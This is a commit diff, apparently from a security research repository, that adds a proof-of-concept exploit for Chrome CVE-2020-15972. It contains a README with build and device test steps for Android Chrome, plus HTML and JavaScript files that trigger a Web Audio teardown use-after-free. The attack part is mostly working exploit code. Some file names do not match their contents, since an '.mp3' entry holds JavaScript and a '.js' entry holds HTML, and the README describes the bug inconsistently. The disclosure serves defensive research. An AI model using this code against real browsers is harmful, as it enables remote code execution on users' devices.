Add CVE-2020-15972

Author: m-y-mo

SecurityExploits/Chrome/blink/CVE-2020-15972/README.md

@@ -0,0 +1,31 @@
+## Chrome renderer RCE CVE-2020-15972
+
+The write up can be found [here](https://securitylab.github.com/research/one_day_short_of_a_fullchain_renderer). This is a bug in Chrome that I reported in September 2020 that is a duplicate of [1115901](https://bugs.chromium.org/p/chromium/issues/detail?id=1115901) and was credited to an anonymous researcher. The GitHub Advisory can be found [here](https://securitylab.github.com/advisories/GHSL-2020-167-chrome) and the Chrome issue that I filed [here](https://bugs.chromium.org/p/chromium/issues/detail?id=1125635). The bug can be used to escape the Chrome sandbox from a compromised renderer.
+
+The exploit is tested on the 64 bit beta version 86.0.4240.30 of Chrome with the following build config (`args.gn`), although it affected the stable version 85 of Chrome also:
+
+```
+target_os = "android"
+target_cpu = "arm64"
+is_java_debug = false
+is_debug = false
+symbol_level = 1
+blink_symbol_level = 1
+```
+and build the target `chrome_public_apk`.
+
+The exploit is tested on Samsung Galaxy A71 with firmware version A715FXXU3ATJ2, Baseband A715FXXU3ATI5 and Kernel version 4.14.117-19828683 and also Pixel 4 with AOSP build ID `aosp_flame-userdebug 10 QQ3A.200805.001`. Both runs reliably, although a clean renderer process is needed to launch the exploit, which would be the case when a link is clicked from a logged in site, such as email or twitter. On Pixel 3a, the heap spray is off by one object, so there is probably some degrees of dependencies on devices or OS. (Pixel 3a runs kernel version 4.9, whereas the other 2 devices run kernel 4.14, although when it failed on Pixel 3 it'll most likely just throw an exception instead of crashing the renderer) It is very unlikely that it will work on emulators without modifications to the heap spray.
+
+To test, serve the files in this directory from localhost and open `tear_down_android_rce_release.html` with `chrome://inspect/#devices` on the device in a new tab. (or do the following from the host machine, which works on Pixel 4 but not on Galaxy A71:
+```
+out/<target>/bin/chrome_public_apk run "http://localhost:8000/tear_down_android_rce_release.html"
+```
+)
+
+This is the easiest way to ensure that a new renderer process is used for the content (without having to click on it from a logged in context) It should succeed most of the time. When succeeded, The address of a page whose permissioin is overwritten to `rwx` will be displayed. This can then be verified with `adb`.
+
+The file `out2.mp3` in this directory is a blank `mp3` file that can be generated using `ffmpeg` with the following command:
+
+```
+ffmpeg -f lavfi -i anullsrc=r=4000:cl=mono -t 0.00675 -q:a 9 -acodec libmp3lame out2.mp3
+```

SecurityExploits/Chrome/blink/CVE-2020-15972/out2.mp3

@@ -0,0 +1,15 @@
+// white-noise-processor.js
+function sleep(miliseconds) {
+   var currentTime = new Date().getTime();
+   while (currentTime + miliseconds >= new Date().getTime()) {
+   }
+}
+
+class AutoProcessor extends AudioWorkletProcessor {
+  process (inputs, outputs, parameters) {
+    sleep(5000);
+    return true
+  }
+}
+
+registerProcessor('tear-down', AutoProcessor)

SecurityExploits/Chrome/blink/CVE-2020-15972/tear-down.js

@@ -0,0 +1,51 @@
+<!DOCTYPE html>
+<html>
+<head>
+<script>
+const inputs = 2;
+function sleep(miliseconds) {
+   var currentTime = new Date().getTime();
+   while (currentTime + miliseconds >= new Date().getTime()) {
+   }
+}
+
+async function playSourceNode(audioContext) {
+  let soundSources = [];
+  let soundSource1 = audioContext.createConstantSource();
+  soundSources.push(soundSource1);
+  await audioContext.audioWorklet.addModule('tear-down.js');
+  let worklet;
+  worklet = new AudioWorkletNode(audioContext, 'tear-down');
+  let merger = audioContext.createChannelMerger(32);
+  soundSources.push(audioContext.createConstantSource());
+  soundSource1.connect(worklet).connect(merger, 0, 0);
+  soundSources[1].connect(merger, 0, 1);
+  merger.connect(audioContext.destination);
+  for (let i = 0; i < inputs; i++) {
+    soundSources[i].start();
+  }
+  return [soundSources, worklet];
+}
+
+function onLoad() {
+	let audioCtx = new OfflineAudioContext(2,44100, 44100);
+    playSourceNode(audioCtx).then((src)=>{
+
+      for (let i = 0; i < 100; i++) {
+        audioCtx.createConstantSource().start();
+      }
+
+      audioCtx.startRendering();
+      sleep(200);
+      src[1].disconnect();
+      for (let i = 0; i < src[0].length; i++) {
+        src[0][i].disconnect();
+      }
+      parent.remove();
+    });
+}
+
+</script>
+</head>
+<body onload="onLoad()"/>
+</html>

SecurityExploits/Chrome/blink/CVE-2020-15972/tear_down2.html

@@ -0,0 +1,37 @@
+<!DOCTYPE html>
+<html>
+<head>
+<script>
+const inputs = 1;
+function sleep(miliseconds) {
+   var currentTime = new Date().getTime();
+   while (currentTime + miliseconds >= new Date().getTime()) {
+   }
+}
+
+async function playSourceNode(audioContext) {
+  let soundSource1 = audioContext.createConstantSource();
+  await audioContext.audioWorklet.addModule('tear-down.js');
+  let worklet;
+  worklet = new AudioWorkletNode(audioContext, 'tear-down');
+  let delay = audioContext.createDelay(0.01);
+  soundSource1.connect(worklet).connect(delay).connect(audioContext.destination);
+  soundSource1.start();
+  return [soundSource1, worklet];
+}
+
+function onLoad() {
+	let audioCtx = new OfflineAudioContext(1,44100, 44100);
+    playSourceNode(audioCtx).then((src)=>{
+      audioCtx.startRendering();
+      sleep(200);
+      src[0].disconnect();
+      src[1].disconnect();
+      parent.removeVirtual();
+    });
+}
+
+</script>
+</head>
+<body onload="onLoad()"/>
+</html>